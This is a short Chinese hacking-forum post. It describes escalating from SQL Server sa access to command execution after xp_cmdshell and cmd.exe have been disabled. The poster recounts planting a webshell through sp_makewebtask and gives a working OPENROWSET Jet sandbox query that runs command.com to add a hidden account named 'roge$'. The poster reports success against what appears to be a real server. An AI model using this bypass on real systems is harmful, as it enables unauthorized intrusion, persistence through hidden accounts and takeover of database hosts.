sa权限cmd执行返回命令行提示已关闭的解决办法

[复制链接]
查看302 | 回复0 | 2012-4-1 19:18:41 | 显示全部楼层 |阅读模式
sa权限,用xp_cmdshell执行cmd但是返回命令行提示已关闭


然后又试了试其他存储OA,job,沙盒什么的全部玩了一圈下来,照样不能执行命令,很无奈啊,遇见个变态sa



试试了sp_makewebtask存储,还好能导出了个webshell



进去看看情况到底咋回事



连上sql执行命令时突然想起穿山甲的4个存储过程执行命令都调用了CMD



cmd被禁用了,当然没得玩了



传了个cmd上去试试一样的不能执行



想了想用其他大杀器试试提权,cmd禁用了也没得玩了



在system32翻了翻,发现command.com也能执行命令,基本跟cmd差不多,但不太清楚这算不算命令提示符



在本机试了试,禁用了cmd,发现command.com正常运行。哈哈



果断调用沙盒用command.com执行



select*fromopenrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','selectshell("command.com/cnet1userroge$/add")')



netuser看了看成功执行
 
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则